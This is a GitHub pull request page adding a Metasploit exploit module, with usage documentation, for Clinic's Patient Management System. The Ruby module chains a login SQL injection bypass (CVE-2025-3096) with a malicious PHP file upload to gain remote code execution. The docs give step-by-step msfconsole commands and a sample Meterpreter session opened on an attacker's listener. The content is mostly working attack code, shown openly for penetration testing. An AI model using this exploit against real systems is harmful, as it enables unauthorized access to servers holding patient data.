Skip to content

Clinic Patient's Management System SQLi (CVE-2025-3096) #20177

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 9 commits into from
May 21, 2025
Merged

Clinic Patient's Management System SQLi (CVE-2025-3096) #20177

Show file tree
Hide file tree
Changes from 6 commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
bfa3b63
Clinic Pacient Management System SQLi to RCE module
msutovsky-r7 Feb 5, 2025
939d997
Adds documentation
msutovsky-r7 May 13, 2025
41b35fb
Addressing comments
msutovsky-r7 May 15, 2025
e93b4d4
Fixing disclosure year
msutovsky-r7 May 15, 2025
e0383b4
Add report_vuln
msutovsky-r7 May 16, 2025
fb24c55
Fixes deleting file
msutovsky-r7 May 16, 2025
070bd54
Addressing comments
msutovsky-r7 May 19, 2025
86335ba
Fixes URI path
msutovsky-r7 May 21, 2025
1d6ec73
Fixes file cleanup
msutovsky-r7 May 21, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
67 changes: 67 additions & 0 deletions documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
## Vulnerable Application
Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.

## Verification Steps

### Vulnerable Application Installation Setup
1. Install Clinic's Patient Management System on your web server.
- Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)

2. Start `msfconsole` and load the exploit module:
```bash
msfconsole
use exploit/multi/http/clinic_pms_sqli_to_rce
```

3. Set the required options:
```bash
set rport <port>
set rhost <ip>
set targeturi /pms
```

4. Check if the target is vulnerable:
```bash
check
```

If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
```
[+] <IP> The target is vulnerable.
```

5. Set up the listener for the exploit:
```bash
set lport <port>
set lhost <ip>
```

6. Launch the exploit:
```bash
exploit
```

7. If successful, you will receive a PHP Meterpreter shell.

## Options
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).

## Scenarios

```bash
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200

meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux

```

195 changes: 195 additions & 0 deletions modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,195 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
include Msf::Exploit::FileDropper
include Msf::Post::File
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Clinic\'s Patient Management System 1.0 - Unauthenticated RCE',
'Description' => %q{
This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
},
'Author' => [
'msutovsky-r7' # CVE-2025-3096, module developer
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Privileged' => false,
'Targets' => [
['Clinic Patient Management System 2.0', {}]
],
'DefaultTarget' => 0,
'References' => [
['CVE', '2022-2297'],
['CVE', '2025-3096'],
['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
],
'DisclosureDate' => '2025-01-04',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
])
end

def check
print_status('Checking if target is vulnerable...')

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
})

return Exploit::CheckCode::Unknown('Unexpected response code from server') unless res&.code == 200
return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")

return Exploit::CheckCode::Appears('Clinic PMS detected')
end

def login_sqli
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path + 'index.php'),
'method' => 'POST',
'keep_cookies' => true,
'vars_post' =>
{
user_name: "' or '1'='1' LIMIT 1;--",
password: '',
login: ''
}
})

fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('location')

fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['location'] == 'dashboard.php'
print_status('Logged using SQL injection..')
end

def upload_payload
username = Rex::Text.rand_text_alphanumeric(8)
password = Rex::Text.rand_text_alphanumeric(8)
filename = Rex::Text.rand_text_alphanumeric(8) + '.php'

boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(16)}"

data_post = "--#{boundary}\r\n"
data_post << "Content-Disposition: form-data; name=\"hidden_id\"\r\n\r\n"
data_post << "1\r\n"
data_post << "--#{boundary}\r\n"

data_post << "Content-Disposition: form-data; name=\"display_name\"\r\n\r\n"
data_post << "#{username}\r\n"
data_post << "--#{boundary}\r\n"

data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
data_post << "#{username}\r\n"
data_post << "--#{boundary}\r\n"

data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
data_post << "#{password}\r\n"
data_post << "--#{boundary}\r\n"

data_post << "Content-Disposition: form-data; name=\"profile_picture\"; filename=\"#{filename}\"\r\n"
data_post << "Content-Type: application/x-php\r\n\r\n"
data_post << "#{payload.encoded}\r\n"
data_post << "--#{boundary}\r\n"

data_post << "Content-Disposition: form-data; name=\"save_user\"\r\n\r\n"
data_post << "\r\n"
data_post << "--#{boundary}--\r\n"

res = send_request_cgi({
'uri' => normalize_uri('/pms/update_user.php'),
'method' => 'POST',
'keep_cookies' => true,
'ctype' => "multipart/form-data; boundary=#{boundary}",
'vars_get' =>
{
'user_id' => '1'
},
'data' => data_post
})

fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')

fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
print_status('Malicious file uploaded..')
end

def logout
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path + 'logout.php'),
'method' => 'GET'
})
fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')

fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php'
print_status('Logged out..')
@cookie_jar.clear
end

def trigger_payload
logout
login_sqli

print_status('Reporting vulnerability')
report_vuln(
host: datastore['RHOSTS'],
name: name,
refs: references,
info: 'The target is vulnerable to CVE-2025-3096.'
)

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path + '/update_user.php'),
'method' => 'GET',
'keep_cookies' => true,
'vars_get' =>
{
'user_id' => '1'
}
})

fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 200
fail_with Failure::UnexpectedReply, 'Unexpected content of body' if res.body&.blank?
html_document = res.get_html_document
payload_path = html_document.xpath('//img[@alt="User Image"]/@src')&.text

fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?

send_request_cgi({
'uri' => normalize_uri(target_uri.path + '/' + payload_path),
'method' => 'GET',
'keep_cookies' => true
})
register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
end

def exploit
login_sqli
upload_payload
trigger_payload
end
end